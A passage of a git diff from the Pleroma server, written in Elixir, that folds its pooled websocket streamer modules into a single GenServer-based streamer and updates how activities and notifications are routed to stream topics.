- defp attachment_topics(%{data: %{"attachment" => []}}, _act), do: []
-
- defp attachment_topics(_object, %{local: true}), do: ["public:media", "public:local:media"]
-
- defp attachment_topics(_object, _act), do: ["public:media"]
-end
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 3b37ce630..49094704b 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -141,7 +141,7 @@ defp oauth_cleanup_enabled?,
defp streamer_child(:test), do: []
defp streamer_child(_) do
- [Pleroma.Web.Streamer.supervisor()]
+ [Pleroma.Web.Streamer]
end
defp oauth_cleanup_child(true),
diff --git a/lib/pleroma/notification.ex b/lib/pleroma/notification.ex
index 8012389ac..b7c880c51 100644
--- a/lib/pleroma/notification.ex
+++ b/lib/pleroma/notification.ex
@@ -210,10 +210,8 @@ def create_notification(%Activity{} = activity, %User{} = user) do
unless skip?(activity, user) do
notification = %Notification{user_id: user.id, activity: activity}
{:ok, notification} = Repo.insert(notification)
-
- ["user", "user:notification"]
- |> Streamer.stream(notification)
-
+ Streamer.stream("user", notification)
+ Streamer.stream("user:notification", notification)
Push.send(notification)
notification
end
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index bc5ae7fbf..41f6a0f1f 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -4,7 +4,6 @@
defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.Activity
- alias Pleroma.Activity.Ir.Topics
alias Pleroma.Config
alias Pleroma.Conversation
alias Pleroma.Notification
@@ -17,7 +16,6 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.User
alias Pleroma.Web.ActivityPub.MRF
alias Pleroma.Web.ActivityPub.Transmogrifier
- alias Pleroma.Web.Streamer
alias Pleroma.Web.WebFinger
alias Pleroma.Workers.BackgroundWorker
@@ -189,7 +187,9 @@ def stream_out_participations(participations) do
participations
|> Repo.preload(:user)
- Streamer.stream("participation", participations)
+ Enum.each(participations, fn participation ->
+ Pleroma.Web.Streamer.stream("participation", participation)
+ end)
end
def stream_out_participations(%Object{data: %{"context" => context}}, user) do
@@ -208,15 +208,41 @@ def stream_out_participations(%Object{data: %{"context" => context}}, user) do
def stream_out_participations(_, _), do: :noop
- def stream_out(%Activity{data: %{"type" => data_type}} = activity)
- when data_type in ["Create", "Announce", "Delete"] do
- activity
- |> Topics.get_activity_topics()
- |> Streamer.stream(activity)
- end
+ def stream_out(activity) do
+ if activity.data["type"] in ["Create", "Announce", "Delete"] do
+ object = Object.normalize(activity)
+ # Do not stream out poll replies
+ unless object.data["type"] == "Answer" do
+ Pleroma.Web.Streamer.stream("user", activity)
+ Pleroma.Web.Streamer.stream("list", activity)
- def stream_out(_activity) do
- :noop
+ if get_visibility(activity) == "public" do
+ Pleroma.Web.Streamer.stream("public", activity)
+
+ if activity.local do
+ Pleroma.Web.Streamer.stream("public:local", activity)
+ end
+
+ if activity.data["type"] in ["Create"] do
+ object.data
+ |> Map.get("tag", [])
+ |> Enum.filter(fn tag -> is_bitstring(tag) end)
+ |> Enum.each(fn tag -> Pleroma.Web.Streamer.stream("hashtag:" <> tag, activity) end)
+
+ if object.data["attachment"] != [] do
+ Pleroma.Web.Streamer.stream("public:media", activity)
+
+ if activity.local do
+ Pleroma.Web.Streamer.stream("public:local:media", activity)
+ end
+ end
+ end
+ else
+ if get_visibility(activity) == "direct",
+ do: Pleroma.Web.Streamer.stream("direct", activity)
+ end
+ end
+ end
end
def create(%{to: to, actor: actor, context: context, object: object} = params, fake \\ false) do
diff --git a/lib/pleroma/web/mastodon_api/websocket_handler.ex b/lib/pleroma/web/mastodon_api/websocket_handler.ex
index 3c26eb406..dbd3542ea 100644
--- a/lib/pleroma/web/mastodon_api/websocket_handler.ex
+++ b/lib/pleroma/web/mastodon_api/websocket_handler.ex
@@ -8,7 +8,6 @@ defmodule Pleroma.Web.MastodonAPI.WebsocketHandler do
alias Pleroma.Repo
alias Pleroma.User
alias Pleroma.Web.OAuth.Token
- alias Pleroma.Web.Streamer
@behaviour :cowboy_websocket
@@ -25,7 +24,7 @@ defmodule Pleroma.Web.MastodonAPI.WebsocketHandler do
]
@anonymous_streams ["public", "public:local", "hashtag"]
- # Handled by periodic keepalive in Pleroma.Web.Streamer.Ping.
+ # Handled by periodic keepalive in Pleroma.Web.Streamer.
@timeout :infinity
def init(%{qs: qs} = req, state) do
@@ -66,7 +65,7 @@ def websocket_info(:subscribe, state) do
}, topic #{state.topic}"
)
- Streamer.add_socket(state.topic, streamer_socket(state))
+ Pleroma.Web.Streamer.add_socket(state.topic, streamer_socket(state))
{:ok, state}
end
@@ -81,7 +80,7 @@ def terminate(reason, _req, state) do
}, topic #{state.topic || "?"}: #{inspect(reason)}"
)
- Streamer.remove_socket(state.topic, streamer_socket(state))
+ Pleroma.Web.Streamer.remove_socket(state.topic, streamer_socket(state))
:ok
end
diff --git a/lib/pleroma/web/streamer.ex b/lib/pleroma/web/streamer.ex
new file mode 100644
index 000000000..587c43f40
--- /dev/null
+++ b/lib/pleroma/web/streamer.ex
@@ -0,0 +1,318 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.Streamer do
+ use GenServer
+ require Logger
+ alias Pleroma.Activity
+ alias Pleroma.Config
+ alias Pleroma.Conversation.Participation
+ alias Pleroma.Notification
+ alias Pleroma.Object
+ alias Pleroma.User
+ alias Pleroma.Web.ActivityPub.ActivityPub
+ alias Pleroma.Web.ActivityPub.Visibility
+ alias Pleroma.Web.CommonAPI
+ alias Pleroma.Web.MastodonAPI.NotificationView
+
+ @keepalive_interval :timer.seconds(30)
+
+ def start_link(_) do
+ GenServer.start_link(__MODULE__, %{}, name: __MODULE__)
+ end
+
+ def add_socket(topic, socket) do
+ GenServer.cast(__MODULE__, %{action: :add, socket: socket, topic: topic})
+ end
+
+ def remove_socket(topic, socket) do
+ GenServer.cast(__MODULE__, %{action: :remove, socket: socket, topic: topic})
+ end
+
+ def stream(topic, item) do
+ GenServer.cast(__MODULE__, %{action: :stream, topic: topic, item: item})
+ end
+
+ def init(args) do
+ Process.send_after(self(), %{action: :ping}, @keepalive_interval)
+
+ {:ok, args}
+ end
+
+ def handle_info(%{action: :ping}, topics) do
+ topics
+ |> Map.values()
+ |> List.flatten()
+ |> Enum.each(fn socket ->
+ Logger.debug("Sending keepalive ping")
+ send(socket.transport_pid, {:text, ""})
+ end)
+
+ Process.send_after(self(), %{action: :ping}, @keepalive_interval)
+
+ {:noreply, topics}
+ end
+
+ def handle_cast(%{action: :stream, topic: "direct", item: item}, topics) do
+ recipient_topics =
+ User.get_recipients_from_activity(item)
+ |> Enum.map(fn %{id: id} -> "direct:#{id}" end)
+
+ Enum.each(recipient_topics || [], fn user_topic ->
+ Logger.debug("Trying to push direct message to #{user_topic}\n\n")
+ push_to_socket(topics, user_topic, item)
+ end)
+
+ {:noreply, topics}
+ end
+
+ def handle_cast(%{action: :stream, topic: "participation", item: participation}, topics) do
+ user_topic = "direct:#{participation.user_id}"
+ Logger.debug("Trying to push a conversation participation to #{user_topic}\n\n")
+
+ push_to_socket(topics, user_topic, participation)
+
+ {:noreply, topics}
+ end
+
+ def handle_cast(%{action: :stream, topic: "list", item: item}, topics) do
+ # filter the recipient list if the activity is not public, see #270.
+ recipient_lists =
+ case Visibility.is_public?(item) do
+ true ->
+ Pleroma.List.get_lists_from_activity(item)
+
+ _ ->
+ Pleroma.List.get_lists_from_activity(item)
+ |> Enum.filter(fn list ->
+ owner = User.get_cached_by_id(list.user_id)
+
+ Visibility.visible_for_user?(item, owner)
+ end)
+ end
+
+ recipient_topics =
+ recipient_lists
+ |> Enum.map(fn %{id: id} -> "list:#{id}" end)
+
+ Enum.each(recipient_topics || [], fn list_topic ->
+ Logger.debug("Trying to push message to #{list_topic}\n\n")
+ push_to_socket(topics, list_topic, item)
+ end)
+
+ {:noreply, topics}
+ end
+
+ def handle_cast(
+ %{action: :stream, topic: topic, item: %Notification{} = item},
+ topics
+ )
+ when topic in ["user", "user:notification"] do
+ topics
+ |> Map.get("#{topic}:#{item.user_id}", [])
+ |> Enum.each(fn socket ->
+ with %User{} = user <- User.get_cached_by_ap_id(socket.assigns[:user].ap_id),
+ true <- should_send?(user, item) do
+ send(
+ socket.transport_pid,
+ {:text, represent_notification(socket.assigns[:user], item)}
+ )
+ end
+ end)
+
+ {:noreply, topics}
+ end
+
+ def handle_cast(%{action: :stream, topic: "user", item: item}, topics) do
+ Logger.debug("Trying to push to users")
+
+ recipient_topics =
+ User.get_recipients_from_activity(item)
+ |> Enum.map(fn %{id: id} -> "user:#{id}" end)
+
+ Enum.each(recipient_topics, fn topic ->
+ push_to_socket(topics, topic, item)
+ end)
+
+ {:noreply, topics}
+ end
+
+ def handle_cast(%{action: :stream, topic: topic, item: item}, topics) do
+ Logger.debug("Trying to push to #{topic}")
+ Logger.debug("Pushing item to #{topic}")
+ push_to_socket(topics, topic, item)
+ {:noreply, topics}
+ end
+
+ def handle_cast(%{action: :add, topic: topic, socket: socket}, sockets) do
+ topic = internal_topic(topic, socket)
+ sockets_for_topic = sockets[topic] || []
+ sockets_for_topic = Enum.uniq([socket | sockets_for_topic])
+ sockets = Map.put(sockets, topic, sockets_for_topic)
+ Logger.debug("Got new conn for #{topic}")
+ {:noreply, sockets}
+ end
+
+ def handle_cast(%{action: :remove, topic: topic, socket: socket}, sockets) do
+ topic = internal_topic(topic, socket)
+ sockets_for_topic = sockets[topic] || []
+ sockets_for_topic = List.delete(sockets_for_topic, socket)
+ sockets = Map.put(sockets, topic, sockets_for_topic)
+ Logger.debug("Removed conn for #{topic}")
+ {:noreply, sockets}
+ end
+
+ def handle_cast(m, state) do
+ Logger.info("Unknown: #{inspect(m)}, #{inspect(state)}")
+ {:noreply, state}
+ end
+
+ defp represent_update(%Activity{} = activity, %User{} = user) do
+ %{
+ event: "update",
+ payload:
+ Pleroma.Web.MastodonAPI.StatusView.render(
+ "status.json",
+ activity: activity,
+ for: user
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ defp represent_update(%Activity{} = activity) do
+ %{
+ event: "update",
+ payload:
+ Pleroma.Web.MastodonAPI.StatusView.render(
+ "status.json",
+ activity: activity
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ def represent_conversation(%Participation{} = participation) do
+ %{
+ event: "conversation",
+ payload:
+ Pleroma.Web.MastodonAPI.ConversationView.render("participation.json", %{
+ participation: participation,
+ for: participation.user
+ })
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ @spec represent_notification(User.t(), Notification.t()) :: binary()
+ defp represent_notification(%User{} = user, %Notification{} = notify) do
+ %{
+ event: "notification",
+ payload:
+ NotificationView.render(
+ "show.json",
+ %{notification: notify, for: user}
+ )
+ |> Jason.encode!()
+ }
+ |> Jason.encode!()
+ end
+
+ defp should_send?(%User{} = user, %Activity{} = item) do
+ blocks = user.info.blocks || []
+ mutes = user.info.mutes || []
+ reblog_mutes = user.info.muted_reblogs || []
+ domain_blocks = Pleroma.Web.ActivityPub.MRF.subdomains_regex(user.info.domain_blocks)
+
+ with parent when not is_nil(parent) <- Object.normalize(item),
+ true <- Enum.all?([blocks, mutes, reblog_mutes], &(item.actor not in &1)),
+ true <- Enum.all?([blocks, mutes], &(parent.data["actor"] not in &1)),
+ %{host: item_host} <- URI.parse(item.actor),
+ %{host: parent_host} <- URI.parse(parent.data["actor"]),
+ false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, item_host),
+ false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, parent_host),
+ true <- thread_containment(item, user),
+ false <- CommonAPI.thread_muted?(user, item) do
+ true
+ else
+ _ -> false
+ end
+ end
+
+ defp should_send?(%User{} = user, %Notification{activity: activity}) do
+ should_send?(user, activity)
+ end
+
+ def push_to_socket(topics, topic, %Activity{data: %{"type" => "Announce"}} = item) do
+ Enum.each(topics[topic] || [], fn socket ->
+ # Get the current user so we have up-to-date blocks etc.
+ if socket.assigns[:user] do
+ user = User.get_cached_by_ap_id(socket.assigns[:user].ap_id)
+
+ if should_send?(user, item) do
+ send(socket.transport_pid, {:text, represent_update(item, user)})
+ end
+ else
+ send(socket.transport_pid, {:text, represent_update(item)})
+ end
+ end)
+ end
+
+ def push_to_socket(topics, topic, %Participation{} = participation) do
+ Enum.each(topics[topic] || [], fn socket ->
+ send(socket.transport_pid, {:text, represent_conversation(participation)})
+ end)
+ end
+
+ def push_to_socket(topics, topic, %Activity{
+ data: %{"type" => "Delete", "deleted_activity_id" => deleted_activity_id}
+ }) do
+ Enum.each(topics[topic] || [], fn socket ->
+ send(
+ socket.transport_pid,
+ {:text, %{event: "delete", payload: to_string(deleted_activity_id)} |> Jason.encode!()}
+ )
+ end)
+ end
+
+ def push_to_socket(_topics, _topic, %Activity{data: %{"type" => "Delete"}}), do: :noop
+
+ def push_to_socket(topics, topic, item) do
+ Enum.each(topics[topic] || [], fn socket ->
+ # Get the current user so we have up-to-date blocks etc.
+ if socket.assigns[:user] do
+ user = User.get_cached_by_ap_id(socket.assigns[:user].ap_id)
+ blocks = user.info.blocks || []
+ mutes = user.info.mutes || []
+
+ with true <- Enum.all?([blocks, mutes], &(item.actor not in &1)),
+ true <- thread_containment(item, user) do
+ send(socket.transport_pid, {:text, represent_update(item, user)})
+ end
+ else
+ send(socket.transport_pid, {:text, represent_update(item)})
+ end
+ end)
+ end
+
+ defp internal_topic(topic, socket) when topic in ~w[user user:notification direct] do
+ "#{topic}:#{socket.assigns[:user].id}"
+ end
+
+ defp internal_topic(topic, _), do: topic
+
+ @spec thread_containment(Activity.t(), User.t()) :: boolean()
+ defp thread_containment(_activity, %User{info: %{skip_thread_containment: true}}), do: true
+
+ defp thread_containment(activity, user) do
+ if Config.get([:instance, :skip_thread_containment]) do
+ true
+ else
+ ActivityPub.contain_activity(activity, user)
+ end
+ end
+end
diff --git a/lib/pleroma/web/streamer/ping.ex b/lib/pleroma/web/streamer/ping.ex
deleted file mode 100644
index f77cbb95c..000000000
--- a/lib/pleroma/web/streamer/ping.ex
+++ /dev/null
@@ -1,33 +0,0 @@
-defmodule Pleroma.Web.Streamer.Ping do
- use GenServer
- require Logger
-
- alias Pleroma.Web.Streamer.State
- alias Pleroma.Web.Streamer.StreamerSocket
-
- @keepalive_interval :timer.seconds(30)
-
- def start_link(opts) do
- ping_interval = Keyword.get(opts, :ping_interval, @keepalive_interval)
- GenServer.start_link(__MODULE__, %{ping_interval: ping_interval}, name: __MODULE__)
- end
-
- def init(%{ping_interval: ping_interval} = args) do
- Process.send_after(self(), :ping, ping_interval)
- {:ok, args}
- end
-
- def handle_info(:ping, %{ping_interval: ping_interval} = state) do
- State.get_sockets()
- |> Map.values()
- |> List.flatten()
- |> Enum.each(fn %StreamerSocket{transport_pid: transport_pid} ->
- Logger.debug("Sending keepalive ping")
- send(transport_pid, {:text, ""})
- end)
-
- Process.send_after(self(), :ping, ping_interval)
-
- {:noreply, state}
- end
-end
diff --git a/lib/pleroma/web/streamer/state.ex b/lib/pleroma/web/streamer/state.ex
deleted file mode 100644
index 7b5199068..000000000
--- a/lib/pleroma/web/streamer/state.ex
+++ /dev/null
@@ -1,68 +0,0 @@
-defmodule Pleroma.Web.Streamer.State do
- use GenServer
- require Logger
-
- alias Pleroma.Web.Streamer.StreamerSocket
-
- def start_link(_) do
- GenServer.start_link(__MODULE__, %{sockets: %{}}, name: __MODULE__)
- end
-
- def add_socket(topic, socket) do
- GenServer.call(__MODULE__, {:add, socket, topic})
- end
-
- def remove_socket(topic, socket) do
- GenServer.call(__MODULE__, {:remove, socket, topic})
- end
-
- def get_sockets do
- %{sockets: stream_sockets} = GenServer.call(__MODULE__, :get_state)
- stream_sockets
- end
-
- def init(init_arg) do
- {:ok, init_arg}
- end
-
- def handle_call(:get_state, _from, state) do
- {:reply, state, state}
- end
-
- def handle_call({:add, socket, topic}, _from, %{sockets: sockets} = state) do
- internal_topic = internal_topic(topic, socket)
- stream_socket = StreamerSocket.from_socket(socket)
-
- sockets_for_topic =
- sockets
- |> Map.get(internal_topic, [])
- |> List.insert_at(0, stream_socket)
- |> Enum.uniq()
-
- state = put_in(state, [:sockets, internal_topic], sockets_for_topic)
- Logger.debug("Got new conn for #{topic}")
- {:reply, state, state}
- end
-
- def handle_call({:remove, socket, topic}, _from, %{sockets: sockets} = state) do
- internal_topic = internal_topic(topic, socket)
- stream_socket = StreamerSocket.from_socket(socket)
-
- sockets_for_topic =
- sockets
- |> Map.get(internal_topic, [])
- |> List.delete(stream_socket)
-
- state = Kernel.put_in(state, [:sockets, internal_topic], sockets_for_topic)
- {:reply, state, state}
- end
-
- defp internal_topic(topic, socket)
- when topic in ~w[user user:notification direct] do
- "#{topic}:#{socket.assigns[:user].id}"
- end
-
- defp internal_topic(topic, _) do
- topic
- end
-end
diff --git a/lib/pleroma/web/streamer/streamer.ex b/lib/pleroma/web/streamer/streamer.ex
deleted file mode 100644
index 8cf719277..000000000
--- a/lib/pleroma/web/streamer/streamer.ex
+++ /dev/null
@@ -1,55 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Web.Streamer do
- alias Pleroma.Web.Streamer.State
- alias Pleroma.Web.Streamer.Worker
-
- @timeout 60_000
- @mix_env Mix.env()
-
- def add_socket(topic, socket) do
- State.add_socket(topic, socket)
- end
-
- def remove_socket(topic, socket) do
- State.remove_socket(topic, socket)
- end
-
- def get_sockets do
- State.get_sockets()
- end
-
- def stream(topics, items) do
- if should_send?() do
- Task.async(fn ->
- :poolboy.transaction(
- :streamer_worker,
- &Worker.stream(&1, topics, items),
- @timeout
- )
- end)
- end
- end
-
- def supervisor, do: Pleroma.Web.Streamer.Supervisor
-
- defp should_send? do
- handle_should_send(@mix_env)
- end
-
- defp handle_should_send(:test) do
- case Process.whereis(:streamer_worker) do
- nil ->
- false
-
- pid ->
- Process.alive?(pid)
- end
- end
-
- defp handle_should_send(_) do
- true
- end
-end
diff --git a/lib/pleroma/web/streamer/streamer_socket.ex b/lib/pleroma/web/streamer/streamer_socket.ex
deleted file mode 100644
index f006c0306..000000000
--- a/lib/pleroma/web/streamer/streamer_socket.ex
+++ /dev/null
@@ -1,31 +0,0 @@
-defmodule Pleroma.Web.Streamer.StreamerSocket do
- defstruct transport_pid: nil, user: nil
-
- alias Pleroma.User
- alias Pleroma.Web.Streamer.StreamerSocket
-
- def from_socket(%{
- transport_pid: transport_pid,
- assigns: %{user: nil}
- }) do
- %StreamerSocket{
- transport_pid: transport_pid
- }
- end
-
- def from_socket(%{
- transport_pid: transport_pid,
- assigns: %{user: %User{} = user}
- }) do
- %StreamerSocket{
- transport_pid: transport_pid,
- user: user
- }
- end
-
- def from_socket(%{transport_pid: transport_pid}) do
- %StreamerSocket{
- transport_pid: transport_pid
- }
- end
-end
diff --git a/lib/pleroma/web/streamer/supervisor.ex b/lib/pleroma/web/streamer/supervisor.ex
deleted file mode 100644
index 6afe19323..000000000
--- a/lib/pleroma/web/streamer/supervisor.ex
+++ /dev/null
@@ -1,33 +0,0 @@
-defmodule Pleroma.Web.Streamer.Supervisor do
- use Supervisor
-
- def start_link(opts) do
- Supervisor.start_link(__MODULE__, opts, name: __MODULE__)
- end
-
- def init(args) do
- children = [
- {Pleroma.Web.Streamer.State, args},
- {Pleroma.Web.Streamer.Ping, args},
- :poolboy.child_spec(:streamer_worker, poolboy_config())
- ]
-
- opts = [strategy: :one_for_one, name: Pleroma.Web.Streamer.Supervisor]
- Supervisor.init(children, opts)
- end
-
- defp poolboy_config do
- opts =
- Pleroma.Config.get(:streamer,
- workers: 3,
- overflow_workers: 2
- )
-
- [
- {:name, {:local, :streamer_worker}},
- {:worker_module, Pleroma.Web.Streamer.Worker},
- {:size, opts[:workers]},
- {:max_overflow, opts[:overflow_workers]}
- ]
- end
-end
diff --git a/lib/pleroma/web/streamer/worker.ex b/lib/pleroma/web/streamer/worker.ex
deleted file mode 100644
index 5804508eb..000000000
--- a/lib/pleroma/web/streamer/worker.ex
+++ /dev/null
@@ -1,220 +0,0 @@
-defmodule Pleroma.Web.Streamer.Worker do
- use GenServer
-
- require Logger
-
- alias Pleroma.Activity
- alias Pleroma.Config
- alias Pleroma.Conversation.Participation
- alias Pleroma.Notification
- alias Pleroma.Object
- alias Pleroma.User
- alias Pleroma.Web.ActivityPub.ActivityPub
- alias Pleroma.Web.ActivityPub.Visibility
- alias Pleroma.Web.CommonAPI
- alias Pleroma.Web.Streamer.State
- alias Pleroma.Web.Streamer.StreamerSocket
- alias Pleroma.Web.StreamerView
-
- def start_link(_) do
- GenServer.start_link(__MODULE__, %{}, [])
- end
-
- def init(init_arg) do
- {:ok, init_arg}
- end
-
- def stream(pid, topics, items) do
- GenServer.call(pid, {:stream, topics, items})
- end
-
- def handle_call({:stream, topics, item}, _from, state) when is_list(topics) do
- Enum.each(topics, fn t ->
- do_stream(%{topic: t, item: item})
- end)
-
- {:reply, state, state}
- end
-
- def handle_call({:stream, topic, items}, _from, state) when is_list(items) do
- Enum.each(items, fn i ->
- do_stream(%{topic: topic, item: i})
- end)
-
- {:reply, state, state}
- end
-
- def handle_call({:stream, topic, item}, _from, state) do
- do_stream(%{topic: topic, item: item})
-
- {:reply, state, state}
- end
-
- defp do_stream(%{topic: "direct", item: item}) do
- recipient_topics =
- User.get_recipients_from_activity(item)
- |> Enum.map(fn %{id: id} -> "direct:#{id}" end)
-
- Enum.each(recipient_topics, fn user_topic ->
- Logger.debug("Trying to push direct message to #{user_topic}\n\n")
- push_to_socket(State.get_sockets(), user_topic, item)
- end)
- end
-
- defp do_stream(%{topic: "participation", item: participation}) do
- user_topic = "direct:#{participation.user_id}"
- Logger.debug("Trying to push a conversation participation to #{user_topic}\n\n")
-
- push_to_socket(State.get_sockets(), user_topic, participation)
- end
-
- defp do_stream(%{topic: "list", item: item}) do
- # filter the recipient list if the activity is not public, see #270.
- recipient_lists =
- case Visibility.is_public?(item) do
- true ->
- Pleroma.List.get_lists_from_activity(item)
-
- _ ->
- Pleroma.List.get_lists_from_activity(item)
- |> Enum.filter(fn list ->
- owner = User.get_cached_by_id(list.user_id)
-
- Visibility.visible_for_user?(item, owner)
- end)
- end
-
- recipient_topics =
- recipient_lists
- |> Enum.map(fn %{id: id} -> "list:#{id}" end)
-
- Enum.each(recipient_topics, fn list_topic ->
- Logger.debug("Trying to push message to #{list_topic}\n\n")
- push_to_socket(State.get_sockets(), list_topic, item)
- end)
- end
-
- defp do_stream(%{topic: topic, item: %Notification{} = item})
- when topic in ["user", "user:notification"] do
- State.get_sockets()
- |> Map.get("#{topic}:#{item.user_id}", [])
- |> Enum.each(fn %StreamerSocket{transport_pid: transport_pid, user: socket_user} ->
- with %User{} = user <- User.get_cached_by_ap_id(socket_user.ap_id),
- true <- should_send?(user, item) do
- send(transport_pid, {:text, StreamerView.render("notification.json", socket_user, item)})
- end
- end)
- end
-
- defp do_stream(%{topic: "user", item: item}) do
- Logger.debug("Trying to push to users")
-
- recipient_topics =
- User.get_recipients_from_activity(item)
- |> Enum.map(fn %{id: id} -> "user:#{id}" end)
-
- Enum.each(recipient_topics, fn topic ->
- push_to_socket(State.get_sockets(), topic, item)
- end)
- end
-
- defp do_stream(%{topic: topic, item: item}) do
- Logger.debug("Trying to push to #{topic}")
- Logger.debug("Pushing item to #{topic}")
- push_to_socket(State.get_sockets(), topic, item)
- end
-
- defp should_send?(%User{} = user, %Activity{} = item) do
- blocks = user.info.blocks || []
- mutes = user.info.mutes || []
- reblog_mutes = user.info.muted_reblogs || []
- domain_blocks = Pleroma.Web.ActivityPub.MRF.subdomains_regex(user.info.domain_blocks)
-
- with parent when not is_nil(parent) <- Object.normalize(item),
- true <- Enum.all?([blocks, mutes, reblog_mutes], &(item.actor not in &1)),
- true <- Enum.all?([blocks, mutes], &(parent.data["actor"] not in &1)),
- %{host: item_host} <- URI.parse(item.actor),
- %{host: parent_host} <- URI.parse(parent.data["actor"]),
- false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, item_host),
- false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, parent_host),
- true <- thread_containment(item, user),
- false <- CommonAPI.thread_muted?(user, item) do
- true
- else
- _ -> false
- end
- end
-
- defp should_send?(%User{} = user, %Notification{activity: activity}) do
- should_send?(user, activity)
- end
-
- def push_to_socket(topics, topic, %Activity{data: %{"type" => "Announce"}} = item) do
- Enum.each(topics[topic] || [], fn %StreamerSocket{
- transport_pid: transport_pid,
- user: socket_user
- } ->
- # Get the current user so we have up-to-date blocks etc.
- if socket_user do
- user = User.get_cached_by_ap_id(socket_user.ap_id)
-
- if should_send?(user, item) do
- send(transport_pid, {:text, StreamerView.render("update.json", item, user)})
- end
- else
- send(transport_pid, {:text, StreamerView.render("update.json", item)})
- end
- end)
- end
-
- def push_to_socket(topics, topic, %Participation{} = participation) do
- Enum.each(topics[topic] || [], fn %StreamerSocket{transport_pid: transport_pid} ->
- send(transport_pid, {:text, StreamerView.render("conversation.json", participation)})
- end)
- end
-
- def push_to_socket(topics, topic, %Activity{
- data: %{"type" => "Delete", "deleted_activity_id" => deleted_activity_id}
- }) do
- Enum.each(topics[topic] || [], fn %StreamerSocket{transport_pid: transport_pid} ->
- send(
- transport_pid,
- {:text, %{event: "delete", payload: to_string(deleted_activity_id)} |> Jason.encode!()}
- )
- end)
- end
-
- def push_to_socket(_topics, _topic, %Activity{data: %{"type" => "Delete"}}), do: :noop
-
- def push_to_socket(topics, topic, item) do
- Enum.each(topics[topic] || [], fn %StreamerSocket{
- transport_pid: transport_pid,
- user: socket_user
- } ->
- # Get the current user so we have up-to-date blocks etc.
- if socket_user do
- user = User.get_cached_by_ap_id(socket_user.ap_id)
- blocks = user.info.blocks || []
- mutes = user.info.mutes || []
-
- with true <- Enum.all?([blocks, mutes], &(item.actor not in &1)),
- true <- thread_containment(item, user) do
- send(transport_pid, {:text, StreamerView.render("update.json", item, user)})
- end
- else
- send(transport_pid, {:text, StreamerView.render("update.json", item)})
- end
- end)
- end
-
- @spec thread_containment(Activity.t(), User.t()) :: boolean()
- defp thread_containment(_activity, %User{info: %{skip_thread_containment: true}}), do: true
-
- defp thread_containment(activity, user) do
- if Config.get([:instance, :skip_thread_containment]) do
- true
- else
- ActivityPub.contain_activity(activity, user)
- end
- end
-end
diff --git a/lib/pleroma/web/views/streamer_view.ex b/lib/pleroma/web/views/streamer_view.ex
deleted file mode 100644
index b13030fa0..000000000
--- a/lib/pleroma/web/views/streamer_view.ex
+++ /dev/null
@@ -1,66 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Web.StreamerView do
- use Pleroma.Web, :view
-
- alias Pleroma.Activity
- alias Pleroma.Conversation.Participation
- alias Pleroma.Notification
- alias Pleroma.User
- alias Pleroma.Web.MastodonAPI.NotificationView
-
- def render("update.json", %Activity{} = activity, %User{} = user) do
- %{
- event: "update",
- payload:
- Pleroma.Web.MastodonAPI.StatusView.render(
- "status.json",
- activity: activity,
- for: user
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- def render("notification.json", %User{} = user, %Notification{} = notify) do
- %{
- event: "notification",
- payload:
- NotificationView.render(
- "show.json",
- %{notification: notify, for: user}
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- def render("update.json", %Activity{} = activity) do
- %{
- event: "update",
- payload:
- Pleroma.Web.MastodonAPI.StatusView.render(
- "status.json",
- activity: activity
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- def render("conversation.json", %Participation{} = participation) do
- %{
- event: "conversation",
- payload:
- Pleroma.Web.MastodonAPI.ConversationView.render("participation.json", %{
- participation: participation,
- for: participation.user
- })
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-end
diff --git a/mix.exs b/mix.exs
index 911ebad1d..f1e98585b 100644
--- a/mix.exs
+++ b/mix.exs
@@ -144,7 +144,6 @@ defp deps do
git: "https://git.pleroma.social/pleroma/http_signatures.git",
ref: "293d77bb6f4a67ac8bde1428735c3b42f22cbb30"},
{:telemetry, "~> 0.3"},
- {:poolboy, "~> 1.5"},
{:prometheus_ex, "~> 3.0"},
{:prometheus_plugs, "~> 1.1"},
{:prometheus_phoenix, "~> 1.3"},
diff --git a/mix.lock b/mix.lock
index 0bf6a811e..41697dd5c 100644
--- a/mix.lock
+++ b/mix.lock
@@ -73,7 +73,6 @@
"plug_crypto": {:hex, :plug_crypto, "1.0.0", "18e49317d3fa343f24620ed22795ec29d4a5e602d52d1513ccea0b07d8ea7d4d", [:mix], [], "hexpm"},
"plug_static_index_html": {:hex, :plug_static_index_html, "1.0.0", "840123d4d3975585133485ea86af73cb2600afd7f2a976f9f5fd8b3808e636a0", [:mix], [{:plug, "~> 1.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"poison": {:hex, :poison, "3.1.0", "d9eb636610e096f86f25d9a46f35a9facac35609a7591b3be3326e99a0484665", [:mix], [], "hexpm"},
- "poolboy": {:hex, :poolboy, "1.5.2", "392b007a1693a64540cead79830443abf5762f5d30cf50bc95cb2c1aaafa006b", [:rebar3], [], "hexpm"},
